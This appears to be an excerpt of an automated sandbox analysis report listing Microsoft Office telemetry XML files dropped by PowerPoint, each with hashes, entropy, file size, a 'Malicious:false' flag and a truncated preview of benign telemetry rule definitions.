                                                                                                                              SHA-256:F72D39A9F2D76612F8DEB39D07DF14B415BCAE5411DB1277A96261E03C37448A
                                                                                                                              SHA-512:7501E160EA884051FEACB4172D098708A95E93CDF39096BA1584C022349BFD04E7E8D753B5788E70F7C227E4ECF92BD9DEC89025377BEAE4D5FB978FD94C2EB6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150239" V="1" DC="SM" EN="Office.PowerPoint.PPT.SectionDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Section_Working_Add">.. <S T="1" F="SecDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Section_Working_Delete">.. <S T="1" F="SecDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Section_Working_Move">.. <S T="1" F="SecDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Section_Working_Name">.. <S T="1" F="SecDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Section_Working_SlideMove">.. <S T="1" F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1235
                                                                                                                              Entropy (8bit):5.171595363412108
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjXwg/GbjWner1D0lVz5/lO69oUFp9y5Kc45/5KjN1xu5KhYIey5K1r5/5K/t:2d0rtrmP5l5JkJ1VOvUBOUD
                                                                                                                              MD5:B4ABE1A56F81A436DD4D1B45182BF22C
                                                                                                                              SHA1:1401A7C428AAF46DB82F205AE8460CC30FD30AF0
                                                                                                                              SHA-256:3101585FD7B86675601CE95AE148E68F66AF60D64A0EA5C1D73B1D6B841E4249
                                                                                                                              SHA-512:BA79D2A053BA88C34AAFCBCDE996D55B2C95E3F1732043E9F59EBFEA704D7162D824BB8C10863599E063EF2E09382AD740BB66C2AD9ED902CC9146E74CBE4762
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150240" V="1" DC="SM" EN="Office.PowerPoint.PPT.TaskpaneAppDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="TaskPaneApp_Download_Add">.. <S T="1" F="TspDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="TaskPaneApp_Download_AddSpecial">.. <S T="1" F="TspDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="TaskPaneApp_Download_Delete">.. <S T="1" F="TspDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="TaskPaneApp_Download_Modified">.. <S T="1" F="TspDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="TaskPane
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1229
                                                                                                                              Entropy (8bit):5.176255074477817
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtUXycS/GbjWner1D0lVz5/lO69oUFp9645E746b/5EUN1x6o5Eee61e5EyrK:2dlcNtrmP5l5IjJ1cS111fOUD
                                                                                                                              MD5:17E4BCA3FE6B9AF11E10EF604808E7F3
                                                                                                                              SHA1:5437D71065197BABB28E1ABAC47AC55BDFCADBB3
                                                                                                                              SHA-256:B88C80A26B559EEF7DD5C73687D7218F466B0138898B8C64ADC304DA89F5BDEA
                                                                                                                              SHA-512:46A7C2B4632987C9CCF05376762B9C52064E437D5C2CA2373F9D72D461A2283EDA5DA183A6B18D4BB2032324C5DE55A59B6C14C242C49D1C1ADD2EFDB89CE493
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150241" V="1" DC="SM" EN="Office.PowerPoint.PPT.TaskpaneAppDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="TaskPaneApp_Working_Add">.. <S T="1" F="TspDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="TaskPaneApp_Working_AddSpecial">.. <S T="1" F="TspDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="TaskPaneApp_Working_Delete">.. <S T="1" F="TspDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="TaskPaneApp_Working_Modified">.. <S T="1" F="TspDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="TaskPaneApp_W
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1216
                                                                                                                              Entropy (8bit):5.122064125865966
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdxvMyg/GbjWner1D0lVz5/lO69oUFp9uO8p4uC8uN1xuG8SYIeuX8wrucEU8U:2dxUyrtrmP5l5wzDf018LrSsvJYOUD
                                                                                                                              MD5:679DEC09705EBAD90B80DC5A0F4BB52A
                                                                                                                              SHA1:320D0DDFACFAC98307C125EC4063A242850BB75F
                                                                                                                              SHA-256:EBB8FA695F31D6E5DDA1475D866AACFA2C25B3C38470C1D3F87995500F6DD2C6
                                                                                                                              SHA-512:3641EBD38EEBA653B0CFA410B2FEF7D98562236CEE2DDA854354D8811B81AF5A562AB851E6E8EF8FB9E4805EDBCD24CF3B5717C183123305504055B083E6243E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150242" V="1" DC="SM" EN="Office.PowerPoint.PPT.CommentDiff.Download" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Comment_Download_Add">.. <S T="1" F="CmtDiff_D_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Comment_Download_Delete">.. <S T="1" F="CmtDiff_D_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Comment_Download_Modified">.. <S T="1" F="CmtDiff_D_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Comment_Download_BothModified">.. <S T="1" F="CmtDiff_D_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Comment_Download_ModifiedA
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1210
                                                                                                                              Entropy (8bit):5.130314113657754
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnUM3McS/GbjWner1D0lVz5/lO69oUFp9I8E7448EUN1xle8EeeV8EyrlUEUo:2dnh8cNtrmP5l5/1D1fDbthbOUD
                                                                                                                              MD5:F8B38A2D8DCDBD52530E768A2542D1A5
                                                                                                                              SHA1:EA746C9A3B40B4B1920CD1BA2EC52C5F1BB7622F
                                                                                                                              SHA-256:FF659A908188E71D8969C67A8C211EF6D62E55C31C4CEA7E7702EE01EDC128B2
                                                                                                                              SHA-512:557C5F445EAAC88D999E55607C747F53D45AB3E068C3A718FF3432D3F93E4A5ED5275F23007F8E5F8DEAF4473E90F1D5443BBE0F5816F59F92887853A3040532
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150243" V="1" DC="SM" EN="Office.PowerPoint.PPT.CommentDiff.Working" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a05zq" A="a8a7k bdp59" />.. </S>.. <C T="FT" I="0" O="true" N="ThreeWayMergeCompleteTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="CorrelationId">.. <S T="1" F="ULS_CorrelationID" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="Comment_Working_Add">.. <S T="1" F="CmtDiff_W_1" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Comment_Working_Delete">.. <S T="1" F="CmtDiff_W_2" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="Comment_Working_Modified">.. <S T="1" F="CmtDiff_W_4" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="Comment_Working_BothModified">.. <S T="1" F="CmtDiff_W_8" M="Ignore" />.. </C>.. <C T="U32" I="6" O="true" N="Comment_Working_ModifiedAndDele
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1501
                                                                                                                              Entropy (8bit):5.134499676463893
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dzUYrH/WAvWAVmRjTAD/GNGDLMrlHh9YsMpMdOsi:cnaHZIOWGBhdiz
                                                                                                                              MD5:54E22064EC36C804E3617F7FF2396185
                                                                                                                              SHA1:603DE62A700904842E2F517C510300CBEB295F95
                                                                                                                              SHA-256:37607AB601D1218974B62EC0EF946057A97148DB6B92D1158BEF83984E42A1B3
                                                                                                                              SHA-512:6D5F5F952C51CA403BE5DFCF0FD734E03E7AC5C701F6B317482E3A6A8B70FE6E2388F5866236A725E40883D120588619769CB508A8241096C032676E2C9CF809
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150246" V="2" DC="SM" EN="Office.PowerPoint.PPT.Shared.TextMerge.ConflictInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bi1g2" />.. </S>.. <C T="U32" I="0" O="false" N="Length_RangeBase">.. <S T="1" F="Length_RangeBase" />.. </C>.. <C T="U64" I="1" O="false" N="Count_ChangesWorking">.. <S T="1" F="Count_ChangesWorking" />.. </C>.. <C T="U64" I="2" O="false" N="Count_ChangesDownload">.. <S T="1" F="Count_ChangesDownload" />.. </C>.. <C T="U32" I="3" O="false" N="Count_OverlappingChanges">.. <S T="1" F="Count_OverlappingChanges" />.. </C>.. <C T="U8" I="4" O="false" N="ChangeTypes_Download">.. <S T="1" F="ChangeTypes_Download" />.. </C>.. <C T="U8" I="5" O="false" N="ChangeTypes_Working">.. <S T="1" F="ChangeTypes_Working" />.. </C>.. <C T="G" I="6" O="true" N="CorrelationId">.. <S T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1185
                                                                                                                              Entropy (8bit):4.903732768966267
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfcz1/GbHerbxerYAferoer5ivXIfgD3nfW8/ufMoxycndp9POGnyR2ooQNHM:2dUz0+rIrWrPr6V3mBxZ51CPv6
                                                                                                                              MD5:04CF772B822E52EB45C7670991CC12D0
                                                                                                                              SHA1:231192187CB48B52396A5ABD9B72CE7AF60EE1F3
                                                                                                                              SHA-256:AED10A90077419464A7B03B03023DB98C6B14F1495D6D1257251E1ED262196D7
                                                                                                                              SHA-512:1598E0067153C2CDB4825501B2F40DD6D90934A328A14E33C8E0C1ED12645BFB7D40848B4510DC54E4DCADC19111CF47F458DB2C3922D8DDFF0F435D2CFA7B7F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150249" V="0" DC="SM" EN="Office.PowerPoint.PPT.Shared.Merge.LayoutDiffInfo" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bumlm" />.. <UTS T="2" Id="bumln" />.. <UTS T="3" Id="ax1o7" />.. <UTS T="4" Id="ax1o3" />.. <US T="5">.. <S T="3" />.. <S T="4" />.. </US>.. </S>.. <G>.. <S T="1">.. <F N="FirstLayoutDiff" />.. </S>.. <S T="2">.. <F N="FirstMainMasterDiff" />.. </S>.. </G>.. <C T="G" I="0" O="true" N="CorrelationId">.. <S T="5" F="ULS_CorrelationID" />.. </C>.. <C T="TAG" I="1" O="true" N="Tag">.. <S T="5" F="ULS_Tag" />.. </C>.. <C T="U32" I="2" O="true" N="FirstLayoutDiff">.. <S T="1" F="FirstLayoutDiff" />.. </C>.. <C T="U32" I="3" O="false" N="CountContentMasterDiffEnum">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="4" O="true" N="FirstMainMasterDiff">.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4317
                                                                                                                              Entropy (8bit):3.7388495821236
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d6YGYrtu0GvsGitWGTsGBpG5sG1wO8GBsGnjG6sG/QG7sGOomYfJjGXVT1rcCx6:cF5uGtvy/neGfJ+QKJ+7
                                                                                                                              MD5:9F4DF524EAA2375A0301B6571EBF630D
                                                                                                                              SHA1:67CC88F34DD4494EF5E38DEB15BFF0822D7FE920
                                                                                                                              SHA-256:A969723F70583DD714623057AC26C8984DBD465950D29DCC8A975918F7A62BD8
                                                                                                                              SHA-512:6403F57409E808991EC2C16DBA84420A9166563DD87A3FCE64E44D2DC626991390C668D7028D997064E1AB3067633F450BE682D7AAA5153DC8941C0964C65CC7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150259" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.RevisionTracking.IncorrectClocks" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b29tw" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="LT">.. <L>.. <S T="1" F="TimeDiffInMs" />.. </L>.. <R>.. <V V="1000" T="U64" />.. </R>.. </O>.. </L>.. <R>.. <O T="GE">.. <L>.. <S T="1" F="TimeDiffInMs" />.. </L>.. <R>.. <V V="0" T="U64" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="3">.. <O T="AND">.. <L>.. <O T="LT">.. <L>.. <S T="1" F="TimeDiffInMs" />.. </L>.. <R>.. <V V="5000" T="U64"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):561
                                                                                                                              Entropy (8bit):5.145841692479477
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnvcrLb/cA/GbaAQOWnerJhCNWEyf/0//+kKhmMNO2su:2dErP/cLhra52EE
                                                                                                                              MD5:BAADF82BDDB3A2F0E4EB9B86332AAA09
                                                                                                                              SHA1:1F829F0FB75C95B7121BD76B385C148C389CDD82
                                                                                                                              SHA-256:07D1BC490A2E817208676115B71015DD020FF2731C415C671490E8FC0BE3DE9E
                                                                                                                              SHA-512:5D9228E41ACAFC6167B74FFE06F0C208E13323759DB86495C3A79542D2CABB0DC28191CBA79F8546D6F7DB1F5BB8F74AE2D66E605B26C46879B014261756CAB3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="150262" V="1" DC="SM" EN="Office.PowerPoint.PPT.Shared.NoInternetConnectivity" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" S="1" DL="B" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ay6hx" A="a9wub" />.. </S>.. <C T="B" I="0" O="false" N="IsNexusDetected">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_TagId" />.. </L>.. <R>.. <V V="ay6hx" T="W" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):517
                                                                                                                              Entropy (8bit):5.066654795394057
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSdjTMFCkoCAvQierBnfXFJiQjFTTXHaSMNO5AHNUlu:2duTMFlHAvcr9v5V07
                                                                                                                              MD5:B193C459E813A668C2FD4248FE9581BD
                                                                                                                              SHA1:0660F4A37A94468CE68DA9041D27753178922664
                                                                                                                              SHA-256:CE55143C4CC81C90D661E0247576AC6E41F454F090F943CB5732D159DB67DD0C
                                                                                                                              SHA-512:AC0C98393EC09049F06E35BC4C9EE5F7CF869846F6362BE9B7C288E65F59D03179FF88FFDB969B6FCBE6A8A236F945E4F1C0B24E5FB7EA3A12AAC2B92A890608
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170000" V="6" DC="SM" EN="Office.Graphics.GVizSmartArtOnLoad" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="axhrr" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="SmartArtCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5980
                                                                                                                              Entropy (8bit):4.560543374557417
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:ciPgvcMuyltVxCRc3pp4gYfIrAySEFA/o3GPQiZUN1GUT25I8hJ:PPgzu64WIf7ySEA/o3gQGQwU25Ii
                                                                                                                              MD5:63E0611A735D2F2668A655AAC4FD5E49
                                                                                                                              SHA1:4513CED4EC17FB469BE6436767F0929920739781
                                                                                                                              SHA-256:194120AAD5C24D6B41071CE0017DE2606507D2E75809F4026C61E7F0BC4FEB69
                                                                                                                              SHA-512:160ED09B7162F5C3008CD798987465797EEF02507F279FA7B89D99A677979CCE91EBBACBADBB94AB1A447C52E8E6BA3640E026EF3EE8B344907AD280BD4930EA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170002" V="6" DC="SM" EN="Office.Graphics.GVisCommandSelectionPassthrough" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="axwza" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="AlgorithmState" />.. </L>.. <R>.. <V V="Begin" T="W" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="AlgorithmState" />.. </L>.. <R>.. <V V="Begin" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="Cmd_Name" />.. </L>.. <R>.. <V V="NULL" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="4">.. <O T="OR">.. <L>.. <O T="OR">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):695
                                                                                                                              Entropy (8bit):4.988669315276604
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSEGkoCAvQiiHXFJiQjEciRDaXOUdyXHaSMNO35csu:2d75HAvMv5p/IS
                                                                                                                              MD5:418C5EE3DA4F31BAEA523DAA597A654C
                                                                                                                              SHA1:5EF013F918665170A2820FD7C6FB59765855EA74
                                                                                                                              SHA-256:EBC4C60C9856A4294A0BBEA3C648FA24A5586CF90B754204287BC7A933BD4F5F
                                                                                                                              SHA-512:9F514C6BE0E807EB60644E8C912E9390235057A2A37575F9408F5507A56EED2E646DFB78BDFCA520407B442EA7474D01991AEE8AE662F2AC222B30DC91A6531A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170003" V="1" DC="SM" EN="Office.Graphics.GVisExceptions" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="OART Exception" S="Medium Unexpected" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. <TI T="4" I="10min" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_TagId" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="4" />.. <S T="2" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):706
                                                                                                                              Entropy (8bit):5.025811692997561
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSMxk3we7koCAvQqAQierLNerHQiBjFJQXHaSM4cQXHhSMNOAdHNS7lu:2d7kAPHAvfrLYrwo4vDr
                                                                                                                              MD5:3FB804DEA45421658FF21BB2E901DCC6
                                                                                                                              SHA1:20AA0F9CDE554999840DD64F80833A41E5F3CF37
                                                                                                                              SHA-256:E209724DB848748C389C0E053643E372A49273676648F58866D3F3EA390CA840
                                                                                                                              SHA-512:9366B3F9FFDA7A21AA0A78402FBF39BEE7D0318E4CB87C8F7C2F45791722579B63D7DC48D0FF7F647FE59A2C9A47B706C547FC64BD99CF25FA22F3B0AA35A55B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170005" V="2" DC="SM" EN="Office.Graphics.GVizARC" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="avx7w" />.. <UTS T="2" Id="avx7x" />.. <A T="3" E="TelemetryShutdown" />.. <A T="4" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="HardwareCriticalFailureCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="SoftwareCriticalFailureCount">.. <C>.. <S T="2" />.. </C>.. </C>.. <T>.. <S T="3" />.. <S T="4" />.. </T>.. <ST>.. <S T="1" />.. <S T="2" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1081
                                                                                                                              Entropy (8bit):4.99472127077792
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSiZyui4pkoCAvQierDsysSN1UdLKftkw9CFIl1fnzle+Dl9osxxroqoocfrq:2d7Zyui4iHAvcrDRjz4ORh9JIdnWk9s
                                                                                                                              MD5:8D5BD0B7837E15CDF137C2EEC0592D9F
                                                                                                                              SHA1:005FCD83EDBDE70A8BBB4C00216A56BBDBA0C67D
                                                                                                                              SHA-256:D211965E524DC42BE23817E6340653CE761CEF77059EB3133048C582ED227880
                                                                                                                              SHA-512:10256A7558B13D014CAEB63070302BE0C87ADC11D86A59E78B1CE3B36E19D8E689E0649E7C0E4FCB5241999B51ED583705625E9333D984E6585D7B34F9C4074E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170007" V="5" DC="SM" EN="Office.Graphics.GvizInsertPictureTelemetry" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="az707" A="ar0tn bqo11" />.. </S>.. <C T="W" I="0" O="true" N="PictureSource">.. <S T="1" F="StorageProvider" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="PictureFormatType">.. <S T="1" F="FileMimeType" M="Ignore" />.. </C>.. <C T="I64" I="2" O="true" N="PictureSize">.. <S T="1" F="ImageFileSize" M="Ignore" />.. </C>.. <C T="I64" I="3" O="true" N="PictureHeight">.. <S T="1" F="Height" M="Ignore" />.. </C>.. <C T="I64" I="4" O="true" N="PictureWidth">.. <S T="1" F="Width" M="Ignore" />.. </C>.. <C T="D" I="5" O="true" N="PictureDpiX">.. <S T="1" F="DpiX" M="Ignore" />.. </C>.. <C T="D" I="6" O="true" N="PictureDpiY">.. <S T="1" F="DpiY" M="Ignore" />.. </C>.. <C T="B" I="7" O="true" N="IsAnimated">.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):739
                                                                                                                              Entropy (8bit):5.101483793033583
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSzsZgJi4pkoCAvQier2riKMAe+DlMyrMfXfxxrdyd+DVfIltNO2su:2d0sZIi4iHAvcrSiK/hSZni+BK
                                                                                                                              MD5:B0A4100DB7E9FCA8847722728F08B965
                                                                                                                              SHA1:D4575D82DAC337F58DD05634E7AB6CD446954F90
                                                                                                                              SHA-256:E4627AA23BBC9E529FE26EB4F3C89334E291503C875D7D35BD698C5F503ABAEB
                                                                                                                              SHA-512:EF69652BE4156062D3AE1A12BA5C5ADFF8A397F77F43A3B1713EE581C15CDF2BAC39081CFA9E18AE94BC5B81D34FBCD2564A1C0BD1F09DE5F6D5CCCCFB890156
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170009" V="1" DC="SM" EN="Office.Graphics.GVizInsertPictureDPITelemetry" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ar39m" A="asjr4 bah6r" />.. </S>.. <C T="I64" I="0" O="false" N="PictureHeight">.. <S T="1" F="Height" />.. </C>.. <C T="I64" I="1" O="false" N="PictureWidth">.. <S T="1" F="Width" />.. </C>.. <C T="D" I="2" O="false" N="PictureDpiX">.. <S T="1" F="DpiX" />.. </C>.. <C T="D" I="3" O="false" N="PictureDpiY">.. <S T="1" F="DpiY" />.. </C>.. <C T="W" I="4" O="false" N="PictureFormatType">.. <S T="1" F="ImageFormat" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
